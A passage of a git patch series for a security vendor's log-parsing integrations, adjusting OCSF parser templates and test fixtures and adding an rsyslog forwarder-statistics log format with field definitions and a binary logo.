             {%- for item in parse_event.message.job.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%}
-        filter: "{{ parse_event.message.job.file != null }}"
+        filter: "{{ parse_event.message.job.get('file') != None }}"
 
       - set:
           file.accessed: "{{ parse_event.message.module.file.accessed_time_dt or parse_event.message.module.file.accessed_time | to_rfc3339 }}"
@@ -838,7 +838,7 @@ stages:
           file.x509.serial_number: "{{ parse_event.message.module.file.signature.certificate.serial_number }}"
           file.x509.subject.distinguished_name: "{{ parse_event.message.module.file.signature.certificate.subject }}"
           file.x509.version_number: "{{ parse_event.message.module.file.signature.certificate.version }}"
-        filter: "{{ parse_event.message.module.file != null }}"
+        filter: "{{ parse_event.message.module.get('file') != None }}"
 
       - set:
           file.hash.md5: >
@@ -853,7 +853,7 @@ stages:
             {%- for item in parse_event.message.module.file.hashes -%}{%- if item.algorithm == 'CTPH' -%}{{ item.value }}{%- endif -%}{%- endfor -%}
           file.hash.tlsh: >
             {%- for item in parse_event.message.module.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%}
-        filter: "{{ parse_event.message.module.file != null }}"
+        filter: "{{ parse_event.message.module.get('file') != None }}"
 
   pipeline_category_system_activity:
     actions:
@@ -935,10 +935,10 @@ stages:
             [
             {%- for item in parse_event.message.answers -%}
             {
-                {%- if item.class != null -%}"class": "{{item.class}}",{%- endif -%}
-                {%- if item.type != null -%}"type": "{{item.type}}",{%- endif -%}
-                {%- if item.ttl != null -%}"ttl": "{{item.ttl}}",{%- endif -%}
-                {%- if item.rdata != null -%}"data": "{{item.rdata}}",{%- endif -%}
+                {%- if item.get('class') != None -%}"class": "{{item.class}}",{%- endif -%}
+                {%- if item.get('type') != None -%}"type": "{{item.type}}",{%- endif -%}
+                {%- if item.get('ttl') != None -%}"ttl": "{{item.ttl}}",{%- endif -%}
+                {%- if item.get('rdata') != None -%}"data": "{{item.rdata}}",{%- endif -%}
             }
             {%- endfor -%}
             ]
@@ -946,11 +946,11 @@ stages:
       - set:
           dns.question.class:
             - "{{ parse_event.message.query.class }}"
-        filter: "{{ parse_event.message.query.class != null }}"
+        filter: "{{ parse_event.message.query.get('class') != None }}"
       - set:
           dns.question.type:
             - "{{ parse_event.message.query.type }}"
-        filter: "{{ parse_event.message.query.type != null }}"
+        filter: "{{ parse_event.message.query.get('type') != None }}"
       - set:
           dns.response_code: "{{ parse_event.message.rcode }}"
           http.response.status_code: "{{ parse_event.message.response.code }}"
@@ -968,13 +968,13 @@ stages:
       - set:
           email.from.address:
             - "{{ parse_event.message.email.from }}"
-        filter: "{{ parse_event.message.email.from != null }}"
+        filter: "{{ parse_event.message.email.get('from') != None }}"
       - set:
           email.message_id: "{{ parse_event.message.email.message_uid }}"
       - set:
           email.reply_to.address:
             - "{{ parse_event.message.email.reply_to }}"
-        filter: "{{ parse_event.message.email.reply_to != null }}"
+        filter: "{{ parse_event.message.email.get('reply_to') != None }}"
       - set:
           email.subject: "{{ parse_event.message.email.subject }}"
           email.to.address: "{{ parse_event.message.email.to }}"
@@ -988,10 +988,10 @@ stages:
           url.original: "{{ parse_event.message.url.url_string }}"
       - set:
           email.attachments.file.size: "{{ parse_event.message.file.size }}"
-        filter: "{{ parse_event.message.file.size != null }}"
+        filter: "{{ parse_event.message.file.get('size') != None }}"
       - set:
           email.attachments.file.name: "{{ parse_event.message.file.name }}"
-        filter: "{{ parse_event.message.file.name != null }}"
+        filter: "{{ parse_event.message.file.get('name') != None }}"
 
   pipeline_category_application_activity:
     actions:

From 77e4aab251fb7b3ddc15dff7e8a94c9d6c54e3fa Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 16 Sep 2024 17:30:34 +0200
Subject: [PATCH 035/317] fixup! fix(OCSF): fix the way to extract
 vulnerabilities

---
 OCSF/ocsf/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 668a21e40..2fe0e1157 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -891,7 +891,7 @@ stages:
       - set:
           ocsf.vulnerabilities: >
             [
-                {%- for item in parse_event.message.vulnerabilities -%}
+                {%- for item in parse_event.message.vulnerabilities[1:] -%}
                 {
                   'id': '{{item.cve.uuid}}',
                   'version': '{{item.cve.cvss.version}}',

From 4dc2f3a3ee111e6d570f3f29985d777d42736dea Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 16 Sep 2024 18:16:14 +0200
Subject: [PATCH 036/317] fix(OCSF): change the way to extract the list of
 group that a user belong to

---
 OCSF/ocsf/_meta/fields.yml                    |  5 ++
 OCSF/ocsf/ingest/parser.yml                   | 62 ++++++++++++-------
 OCSF/ocsf/tests/test_account_change_1.json    |  8 ---
 OCSF/ocsf/tests/test_api_activity_1.json      |  4 --
 OCSF/ocsf/tests/test_api_activity_2.json      | 23 ++++---
 OCSF/ocsf/tests/test_authentication_1.json    |  8 ---
 OCSF/ocsf/tests/test_authentication_2.json    |  8 ---
 OCSF/ocsf/tests/test_authentication_3.json    |  8 ---
 OCSF/ocsf/tests/test_process_activity_1.json  |  4 --
 OCSF/ocsf/tests/test_process_activity_2.json  |  4 --
 OCSF/ocsf/tests/test_system_activity_1.json   |  4 --
 OCSF/ocsf/tests/test_system_activity_2.json   |  4 --
 .../test_windows_resource_activity_1.json     |  4 --
 13 files changed, 60 insertions(+), 86 deletions(-)

diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml
index 1205bf0ae..153d909a6 100644
--- a/OCSF/ocsf/_meta/fields.yml
+++ b/OCSF/ocsf/_meta/fields.yml
@@ -20,6 +20,11 @@ ocsf.class_uid:
   name: ocsf.class_uid
   type: long
 
+ocsf.user.groups:
+  description: The list of groups that the user belong to
+  name: ocsf.user.groups
+  type: array
+
 ocsf.vulnerabilities:
   description: ''
   name: ocsf.vulnerabilities
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 2fe0e1157..0c57d8113 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -339,12 +339,6 @@ stages:
           process.user.group.name: >
             [{%- for item in parse_event.message.actor.process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
 
-          user.group.id: >
-            [{%- for item in parse_event.message.actor.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
-
-          user.group.name: >
-            [{%- for item in parse_event.message.actor.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
-
           process.parent.user.group.id: >
             [{%- for item in parse_event.message.actor.process.parent_process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
 
@@ -360,6 +354,17 @@ stages:
           user.name: "{{ parse_event.message.actor.user.name }}"
           process.parent.command_line: "{{ parse_event.message.actor.process.parent_process.cmd_line }}"
           process.parent.end: "{{ parse_event.message.actor.process.parent_process.terminated_time | to_rfc3339 }}"
+      - set:
+          ocsf.user.groups: >
+            [
+              {%- for item in parse_event.message.actor.user.groups -%}
+              {
+                {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%}
+                {%- if item.name -%}'name': '{{item.name}}',{%- endif -%}
+              },
+              {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.actor.user.get('groups') != None}}"
       - set:
           process.parent.group.id:
             - "{{ parse_event.message.actor.process.parent_process.egid }}"
@@ -708,11 +713,16 @@ stages:
           user.target.name: "{{ parse_event.message.user.name }}"
 
       - set:
-          user.target.group.id: >
-            [{%- for item in parse_event.message.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
-
-          user.target.group.name: >
-            [{%- for item in parse_event.message.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
+          ocsf.user.groups: >
+            [
+              {%- for item in parse_event.message.user.groups -%}
+              {
+                {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%}
+                {%- if item.name -%}'name': '{{item.name}}',{%- endif -%}
+              },
+              {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.user.get('groups') != None}}"
 
   pipeline_object_file:
     actions:
@@ -866,11 +876,16 @@ stages:
           process.exit_code: "{{ parse_event.message.exit_code }}"
 
       - set:
-          user.target.group.id: >
-            [{%- for item in parse_event.message.job.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
-
-          user.target.group.name: >
-            [{%- for item in parse_event.message.job.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
+          ocsf.user.groups: >
+            [
+              {%- for item in parse_event.message.job.user.groups -%}
+              {
+                {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%}
+                {%- if item.name -%}'name': '{{item.name}}',{%- endif -%}
+              },
+              {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.job.user.get('groups') != None}}"
 
   pipeline_category_findings:
     actions:
@@ -919,11 +934,16 @@ stages:
           group.id: "{{ parse_event.message.group.uid }}"
 
       - set:
-          user.changes.group.id: >
-            [{%- for item in parse_event.message.user_result.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
-
-          user.changes.group.name: >
-            [{%- for item in parse_event.message.user_result.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
+          ocsf.user.groups: >
+            [
+              {%- for item in parse_event.message.user_result.groups -%}
+              {
+                {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%}
+                {%- if item.name -%}'name': '{{item.name}}',{%- endif -%}
+              },
+              {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.user_result.get('groups') != None}}"
 
   pipeline_category_network_activity:
     actions:
diff --git a/OCSF/ocsf/tests/test_account_change_1.json b/OCSF/ocsf/tests/test_account_change_1.json
index 9a09eed7b..cbe774508 100644
--- a/OCSF/ocsf/tests/test_account_change_1.json
+++ b/OCSF/ocsf/tests/test_account_change_1.json
@@ -39,16 +39,8 @@
       "ip": "52.95.4.21"
     },
     "user": {
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "arn:aws:sts::112233445566:assumed-role/Admin/Admin-user",
       "target": {
-        "group": {
-          "id": [],
-          "name": []
-        },
         "id": "AROA2W7SOKHEXAMPLE:Admin-user",
         "name": "test_user2"
       }
diff --git a/OCSF/ocsf/tests/test_api_activity_1.json b/OCSF/ocsf/tests/test_api_activity_1.json
index 1c78111ee..393135ad3 100644
--- a/OCSF/ocsf/tests/test_api_activity_1.json
+++ b/OCSF/ocsf/tests/test_api_activity_1.json
@@ -45,10 +45,6 @@
       "ip": "205.8.181.128"
     },
     "user": {
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "arn:aws:iam::1111111111111:user/Level6",
       "name": "Level6"
     },
diff --git a/OCSF/ocsf/tests/test_api_activity_2.json b/OCSF/ocsf/tests/test_api_activity_2.json
index d53c7b8a7..843efb4c2 100644
--- a/OCSF/ocsf/tests/test_api_activity_2.json
+++ b/OCSF/ocsf/tests/test_api_activity_2.json
@@ -28,7 +28,20 @@
       "activity_id": 1,
       "activity_name": "Create",
       "class_name": "API Activity",
-      "class_uid": 6003
+      "class_uid": 6003,
+      "user": {
+        "groups": [
+          {
+            "name": "system:bootstrappers"
+          },
+          {
+            "name": "system:nodes"
+          },
+          {
+            "name": "system:authenticated"
+          }
+        ]
+      }
     },
     "package": {
       "description": [],
@@ -44,14 +57,6 @@
       "path": "/api/v1/nodes"
     },
     "user": {
-      "group": {
-        "id": [],
-        "name": [
-          "system:authenticated",
-          "system:bootstrappers",
-          "system:nodes"
-        ]
-      },
       "id": "heptio-authenticator-aws:123456789012:ABCD1234567890EXAMPLE",
       "name": "system:node:ip-192-001-02-03.ec2.internal"
     },
diff --git a/OCSF/ocsf/tests/test_authentication_1.json b/OCSF/ocsf/tests/test_authentication_1.json
index 3bae772bc..e59719910 100644
--- a/OCSF/ocsf/tests/test_authentication_1.json
+++ b/OCSF/ocsf/tests/test_authentication_1.json
@@ -46,17 +46,9 @@
       "ip": "192.0.2.0"
     },
     "user": {
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "arn:aws:iam::111122223333:user/anaya",
       "name": "anaya",
       "target": {
-        "group": {
-          "id": [],
-          "name": []
-        },
         "id": "arn:aws:iam::111122223333:user/anaya"
       }
     },
diff --git a/OCSF/ocsf/tests/test_authentication_2.json b/OCSF/ocsf/tests/test_authentication_2.json
index 41c2d96a4..5badf14db 100644
--- a/OCSF/ocsf/tests/test_authentication_2.json
+++ b/OCSF/ocsf/tests/test_authentication_2.json
@@ -61,18 +61,10 @@
     },
     "user": {
       "domain": "ATTACKRANGE",
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "NT AUTHORITY\\SYSTEM",
       "name": "WIN-DC-725$",
       "target": {
         "domain": "NT AUTHORITY",
-        "group": {
-          "id": [],
-          "name": []
-        },
         "id": "NT AUTHORITY\\SYSTEM",
         "name": "SYSTEM"
       }
diff --git a/OCSF/ocsf/tests/test_authentication_3.json b/OCSF/ocsf/tests/test_authentication_3.json
index 3504b1c8a..7bb0e9688 100644
--- a/OCSF/ocsf/tests/test_authentication_3.json
+++ b/OCSF/ocsf/tests/test_authentication_3.json
@@ -53,17 +53,9 @@
       "port": 0
     },
     "user": {
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "NULL SID",
       "target": {
         "domain": "EC2AMAZ-6KJ2BPP",
-        "group": {
-          "id": [],
-          "name": []
-        },
         "id": "NULL SID",
         "name": "Administrator"
       }
diff --git a/OCSF/ocsf/tests/test_process_activity_1.json b/OCSF/ocsf/tests/test_process_activity_1.json
index 02bc3a582..a3ec8acfe 100644
--- a/OCSF/ocsf/tests/test_process_activity_1.json
+++ b/OCSF/ocsf/tests/test_process_activity_1.json
@@ -63,10 +63,6 @@
     },
     "user": {
       "domain": "ATTACKRANGE",
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "ATTACKRANGE\\Administrator",
       "name": "Administrator"
     }
diff --git a/OCSF/ocsf/tests/test_process_activity_2.json b/OCSF/ocsf/tests/test_process_activity_2.json
index d2fc4367f..e22931998 100644
--- a/OCSF/ocsf/tests/test_process_activity_2.json
+++ b/OCSF/ocsf/tests/test_process_activity_2.json
@@ -54,10 +54,6 @@
     },
     "user": {
       "domain": "LOGISTICS",
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "S-1-5-21-1135140816-2109348461-2107143693-500",
       "name": "Administrator"
     }
diff --git a/OCSF/ocsf/tests/test_system_activity_1.json b/OCSF/ocsf/tests/test_system_activity_1.json
index e106135ff..40267e6ea 100644
--- a/OCSF/ocsf/tests/test_system_activity_1.json
+++ b/OCSF/ocsf/tests/test_system_activity_1.json
@@ -41,10 +41,6 @@
     },
     "user": {
       "domain": "DIR",
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "NT AUTHORITY\\SYSTEM",
       "name": "STLDIRDC1$"
     }
diff --git a/OCSF/ocsf/tests/test_system_activity_2.json b/OCSF/ocsf/tests/test_system_activity_2.json
index 268062b61..aa6ef7511 100644
--- a/OCSF/ocsf/tests/test_system_activity_2.json
+++ b/OCSF/ocsf/tests/test_system_activity_2.json
@@ -41,10 +41,6 @@
     },
     "user": {
       "domain": "SESTEST",
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "SESTEST\\splunker",
       "name": "splunker"
     }
diff --git a/OCSF/ocsf/tests/test_windows_resource_activity_1.json b/OCSF/ocsf/tests/test_windows_resource_activity_1.json
index cae726797..145a83f39 100644
--- a/OCSF/ocsf/tests/test_windows_resource_activity_1.json
+++ b/OCSF/ocsf/tests/test_windows_resource_activity_1.json
@@ -47,10 +47,6 @@
     },
     "user": {
       "domain": "SOI",
-      "group": {
-        "id": [],
-        "name": []
-      },
       "id": "NT AUTHORITY\\SYSTEM",
       "name": "SZUSOIDC1$"
     }

From 3dd5b2df0be0e00181e00e5c5becaca2ef12c801 Mon Sep 17 00:00:00 2001
From: Pierre Penhouet <pierre.penhouet@sekoia.io>
Date: Mon, 16 Sep 2024 23:56:50 +0200
Subject: [PATCH 037/317] Forwarder log format

---
 SekoiaIO/forwarder_log/CHANGELOG.md           |   8 ++
 SekoiaIO/forwarder_log/_meta/fields.yml       |  95 ++++++++++++++++++
 SekoiaIO/forwarder_log/_meta/logo.png         | Bin 0 -> 14799 bytes
 SekoiaIO/forwarder_log/_meta/manifest.yml     |   9 ++
 .../_meta/smart-descriptions.json             |  63 ++++++++++++
 SekoiaIO/forwarder_log/ingest/parser.yml      |  37 +++++++
 SekoiaIO/forwarder_log/tests/action_log.json  |  28 ++++++
 .../forwarder_log/tests/da_queue_log.json     |  32 ++++++
 SekoiaIO/forwarder_log/tests/input_tcp.json   |  26 +++++
 SekoiaIO/forwarder_log/tests/input_udp.json   |  26 +++++
 .../forwarder_log/tests/memory_queue_log.json |  32 ++++++
 SekoiaIO/forwarder_log/tests/output_log.json  |  27 +++++
 SekoiaIO/forwarder_log/tests/stats.json       |  27 +++++
 13 files changed, 410 insertions(+)
 create mode 100644 SekoiaIO/forwarder_log/CHANGELOG.md
 create mode 100644 SekoiaIO/forwarder_log/_meta/fields.yml
 create mode 100644 SekoiaIO/forwarder_log/_meta/logo.png
 create mode 100644 SekoiaIO/forwarder_log/_meta/manifest.yml
 create mode 100644 SekoiaIO/forwarder_log/_meta/smart-descriptions.json
 create mode 100644 SekoiaIO/forwarder_log/ingest/parser.yml
 create mode 100644 SekoiaIO/forwarder_log/tests/action_log.json
 create mode 100644 SekoiaIO/forwarder_log/tests/da_queue_log.json
 create mode 100644 SekoiaIO/forwarder_log/tests/input_tcp.json
 create mode 100644 SekoiaIO/forwarder_log/tests/input_udp.json
 create mode 100644 SekoiaIO/forwarder_log/tests/memory_queue_log.json
 create mode 100644 SekoiaIO/forwarder_log/tests/output_log.json
 create mode 100644 SekoiaIO/forwarder_log/tests/stats.json

diff --git a/SekoiaIO/forwarder_log/CHANGELOG.md b/SekoiaIO/forwarder_log/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/SekoiaIO/forwarder_log/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/SekoiaIO/forwarder_log/_meta/fields.yml b/SekoiaIO/forwarder_log/_meta/fields.yml
new file mode 100644
index 000000000..a172f31a9
--- /dev/null
+++ b/SekoiaIO/forwarder_log/_meta/fields.yml
@@ -0,0 +1,95 @@
+sekoiaio.forwarder.module.type:
+  description: This identifies the module type for which the statistics are being reported
+  name: sekoiaio.forwarder.module.type
+  type: keyword
+
+sekoiaio.forwarder.module.name:
+  description: This identifies the module name for which the statistics are being reported
+  name: sekoiaio.forwarder.module.name
+  type: keyword
+
+sekoiaio.forwarder.intake.name:
+  description: Intake name defined in the forwarder
+  name: sekoiaio.forwarder.intake.name
+  type: keyword
+
+sekoiaio.forwarder.action.processed:
+  description: Number of messages processed by the action
+  name: sekoiaio.forwarder.action.processed
+  type: number
+
+sekoiaio.forwarder.action.failed:
+  description: Number of messages failed in the action
+  name: sekoiaio.forwarder.action.failed
+  type: number
+
+sekoiaio.forwarder.action.suspended:
+  description: Number of messages suspended by the action
+  name: sekoiaio.forwarder.action.suspended
+  type: number
+
+sekoiaio.forwarder.action.resumed:
+  description: Number of messages resumed by the action
+  name: sekoiaio.forwarder.action.resumed
+  type: number
+
+sekoiaio.forwarder.queue.size:
+  description: Number of messages in the queue
+  name: sekoiaio.forwarder.queue.size
+  type: number
+
+sekoiaio.forwarder.queue.enqueued:
+  description: Total number of messages enqueued into this queue since startup
+  name: sekoiaio.forwarder.queue.enqueued
+  type: number
+
+sekoiaio.forwarder.queue.full:
+  description: Number of times the queue was actually full and could not accept additional messages
+  name: sekoiaio.forwarder.queue.full
+  type: number
+
+sekoiaio.forwarder.queue.discarded.full:
+  description: Number of messages discarded because the queue was full
+  name: sekoiaio.forwarder.queue.discarded.full
+  type: number
+
+sekoiaio.forwarder.queue.discarded.nf:
+  description: Number of messages discarded because the queue was nearly full
+  name: sekoiaio.forwarder.queue.discarded.nf
+  type: number
+
+sekoiaio.forwarder.queue.maxqsize:
+  description: The maximum amount of messages that have passed through the queue since rsyslog was started
+  name: sekoiaio.forwarder.queue.maxqsize
+  type: number
+
+sekoiaio.forwarder.output.bytes.sent:
+  description: Number of bytes sent to Sekoia
+  name: sekoiaio.forwarder.output.bytes.sent
+  type: number
+
+sekoiaio.forwarder.input.submitted:
+  description: Number of messages handled by the forwarder input
+  name: sekoiaio.forwarder.input.submitted
+  type: number
+
+sekoiaio.forwarder.input.port:
+  description: Input port use by the forwarder
+  name: sekoiaio.forwarder.input.port
+  type: keyword
+
+sekoiaio.forwarder.stats.utime:
+  description: The amount of user CPU time consumed by rsyslog, in milliseconds.
+  name: sekoiaio.forwarder.stats.utime
+  type: number
+
+sekoiaio.forwarder.stats.stime:
+  description: The amount of system CPU time consumed by rsyslog, in milliseconds.
+  name: sekoiaio.forwarder.stats.stime
+  type: number
+
+sekoiaio.forwarder.stats.openfiles:
+  description: Number of file handles used by rsyslog
+  name: sekoiaio.forwarder.stats.openfiles
+  type: number
+
diff --git a/SekoiaIO/forwarder_log/_meta/logo.png b/SekoiaIO/forwarder_log/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..84c1abac5b3bee4efc2f578e9d259feb1be60b31
GIT binary patch
literal 14799
zcmX}TcOaGj`#*joTO8T@5Rpx?GLG4hnav?GlO4x)gowxpmAxW6BjeaxWM*fCkag@W
z->296_xt?OAGz;y-}iG}*W+<L9@iT!jr-S07)c-qy8iHivJM2{#9aL&A^?9uH;MN_
zkW}JBWd&WYl+77)w<qJ@1h<|0xbpg?Bqnr7zu74$lX948;+WNYGkM>ygn!2WKzq#?
z-Q1`<YiN_V#g~Q8BM@%a5;uuiOL<f|Rzneom?#(MiCg~Q;NMj6<X&L&+jv+YqkEq`
zZq}>m$PsBs_jNvAenbWd#9JbF&{n`(erI5uYE*OXpZ6>wq_>X)9}wwoYMUR=8Eex1
zt=#zriyNL;MVEK*9p*v#v&%v&w0jOJCe^~%!p~W&P(=_z1SEg)=n)6;&u5dgC&*sY
z>@$c_^AZq!6eoZ4nq<vohyqs^e+tUk!hF-yv7?B=(G6rHe2kr=*^kQ+-$pVGS<}O<
z6q)lzv0-)r*GU|Sw2tN!jz8mt?$h&IQR0P&J2BH<rx9yck*EEdZCLHvH9RhJ)~v;D
zP7km2^mR3!`##u*+|LdcXP{lr9Au?ti&>emz?bdUx0?ZXxPd#~iME5UAZK)E_)fQp
zH~eFFLy0xB7m=y=3_Tdt;cDEFz^?ClopPhRt<1ha>7hnIp@;vt(r<88=kW5LV@<?#
z=z}Nd&sZNjSCW@|GQJ&KA&DJOW^L70uDT>$MK4d<LsT5aUVrkX!TL!_SZgzs$)_IL
zshMK^zQfKl%jhsd4f&FWfC$+<m{D3;8u7&QmKZ5s2=rFdZ)J;{l37&DjyCjgS0=FK
zBeA+L;t_xJ$l7JkAT8ad8%!he1KIrCdBxZclJukvy3H=AJ+$_AnJe(&;alXx6L9yd
z8G>RaOx&&onwr^`snUDOpkptyS93Cfnh7r_!}w_UR@Ulm%=O)(wm-!SmS}3S;9!28
zj7WapPIs=3R_Hdm$FEK5=#FN1yyMis?m5E>XGb$cY<RUG?nif4n5bC^9#RS;aNFlI
z7M{k0yv4ZzBOs)q3+7ZNi$QG6X->zwYf3F<SU!sh3Bj>6T{oM0-`!y4qV<udGK@d4
z6>0KK1o3vk)06{}xo^pc*ZyIrXXhs6Ne@au`L*x^GD|dl3y#!~ha}tA*Ep8Y3bS(L
zV8E@DHVI<3n%yXzg(0()F+RqIrIcX1+oof?eJ6q$MaC5UX-;3xy0_uR#=dGZXBTJo
z(<pZ94sxru8dH@@ACk@MT!GzARu%McrW;-M2l`uSic5pwg(|rP_qnm2X(uJw{NP%1
zNw8gf<z><mYBH*b4bLiS!UJ~F=45q24|ixS3GT-Ayt&?vG<0y;p5LH*lXXP)Zt!p3
z(4}@wPGjy6TQQ-nroVxX@&-cR?qx|^1I>drlt4~;hNxDC#J|19{Cylm_RuA{_Fuf_
z!1+MJ)EsfcrNZjP%G0Lfcf63UaM8QKr~<3}0y`Fjo+=x>09K5*Tb+C!sKhsPp;q3t
zp{gH-Q_k^jVSn(8?{|j>;!5ZsUb!e-OKNhXB_FA*meQWUL;rD!UbA!g1MLYrnp*Kr
zHn9SZV}+oCxwY@F#xsj<;4QsgkSw0nIU<ES&Q(z-E}-yz7Ao^%{=rOS3)#OGd8X)x
z<%?bOR&syas<Iu7t&51jI~;wA{?#0iBF^FAEVXXPb&<o1be-yjc{H_|U#KJ{MOexI
zL)}yyv&t{RBixYafQ)V=73nMQU=%Sf!^QCRL@EAdk-xezD?5@}0sF`&6E!&=RAe#u
zJ1@G_|8nbblD!?3q~lTd<mvq#H|9nUC!H58?1&1RX==0IrE64+5XY2#X30As)25QL
zB=Ynhr=s5)HiqF@X)Fc@IoDcw$l?&xF6dIv@O;1F$?&goVL-$!Dz*C^$xr|BXKX7R
zkx$Wm7Gl`&fE{F*b^IVYUIV|4RjDma|Gf0pZv7A8+A;V*h3(~0deurJ>DOo+x2Rx3
z+a{M;SNsk_54ZL~qTZZ4l(Ff4<CZil9OKW>rX1ij9<9x~&x!;u;HBK6+$C4K`C?PD
z*e2X^$<F=$_~X<E<=p4~a!hzuuNx$boxdz1^`EG!>7J7Gb8+_+mw>QwFy(5@w!9Ut
zX1d}k=*B?MEw$Jdgq7lFdseOeh;U~`+>P1IWc!+u6)i#c`}-8~mrHK`{oBn+lLVM3
zw`8(eDLx#COtfdK@!@mXxlqFvh{2)5R#W9qH;P40J@E^#VBqX;Zh=p&e~L@nGcQgz
z5BcUi44WaGHYGHUvbp5aK<#4{gOAL*)Ey(Dgv2PjsP}S+@Ac|QEeaB@ut29IsR#5N
zTof_EGZjhJ^{-P~6bf~h;kSLm--{wtoxPNWaM~LkCOHWRi=WsBEB`s!!I)_JCH+?V
zi<?tKcui%WAvk!f7%UlcNinarZ*aZ4U){w7iZWTh0J?4O#km+?=|2~$<^9;xG2z9T
z^IydrF&v$`?RhD3(G2h_{&&(`b+>YL*>xhI+fTfRgtdljyL$TF=c-`p?_bF2e1hHf
zL%-*h(KVM$Vsq_R(7(7TcaOKnFNd04XBE1w?&VS&fjb;M;v+tVKe><W{X`?DOu_;u
z#H7z<HJf<UnyRq#b(HJ3R3A&v;TQF;#yoXx!;7HMD8ENWK{D!EKI0lUqc^%R%g5z2
z;p3t|!G%%ugsU`8M<5Alw1+UUS!sqsrf6y@nT%stZPAZAEV{}n^7nMwVYhYB)OTej
zJhVPCx7&u%Z~iPeEwLVr@TBpxz_r?^r<QJ9H@u5;s!<-sB4??@b@hoQLuVX<_SSJT
zx4&oWh7!dL-KiY9Kj%@zIN+f*Nwfc}dtRt#i~6_suX#KxA&qsDY>B@0MhByWp*Wf}
zX6|VgFefKt5hD}!`)Xh7VlC^xvc5!9i^+g@V3^-i`QJ4jc5|*mguTL_a*vz4?j6d$
z>JF#za3-Z;EhtT~LeaA-&#iG*{aYVNy~knv0r{B3-iq;J0TZ1}^bPO!uP2pRnl-%<
zt3E2zxiq_nvv9ne2h$$-^h+ER-tTCJ&Lh65@%`LvXu*GQ736t*u$XAQ`TAfxZ~WxQ
ztL^#vTZ2SCbbDe@<_)JW^DY$C{c0?@VufS30xRvLaTdFTQanwA^}%GLN1ki9D(RXt
zr#s1${gohz)dNA9JW|9o$>;Ns$($ZP#|Nl30h5PM{LZ#?Zj<@6Bsl+p8TY;WFoD*p
zzdwQrFG*}{^<ip;SHTg#appP%_v&j4QeGd482S8GuEW58+>Pp!HHBtCAy?yiP4o%G
z@Iy9B-f!HM3YV<2Z8r^T93D{uzgPLHW~+Vw#@Kl6{hH67#s_}min;`;Ib*1}8JY|%
zCXp#WAg}*iru`+_FCDYOJ|GJwFo2p}nR>WPjzR<zLUZ~n*j6U|oUhd_@sD?S55$mu
zbWHSM6eZC6)C)GLjm8VJSz*7GRMxp7TL5+gL0fQl;*gtufI)`rTowP9y4)ePIh8(3
zL4@&+QQ6AX<HbGVrr_H!d%3!F)>FX+nI~$7>~roN+wgLs?T_KLx%_un9x&(Wy-Dd2
z-;^e!$P&KRc(3=@nAshi8*6%8;16XX%p4^4m8>Z&Cne8X+i&RSs~N~xXi%5LBvpVl
zGORhB@g=;mJ519S%wr11%J%3G*4&H|h%CsD!hW2^<NTS+7cOVv1q<C&*IEC|qx{O!
z`gZR+cn%#`bg7m6E|QS4xKknJo5g-n2TeWp`|eawh?h1;TX4Qtbi6Tl^ZhUNY{L7r
z@E}(D$6!Dm`_hwAI->?)_%Y*nugwz66iw?GoyV`QHCS>O|C09{kR$MP9)rhie0zsg
zH<ONev=!}lUf26cdR=52NlICq6n}2<)K<CRV_tHv#B9)ih=bI@FqZ?R8E1l=^MDQ6
zY;@V*9A1^h^<gxq*x2fEuG+d4_#+Ah2gpR?!eKTfU+$R~ETK0!XDrxC({KDM(VMKO
zK<61d^fgIItc#t7u143x;_Lz;a0wkn@l)bk2+h=dijq4AE;@K-0E;8$KQ59NMgCJ_
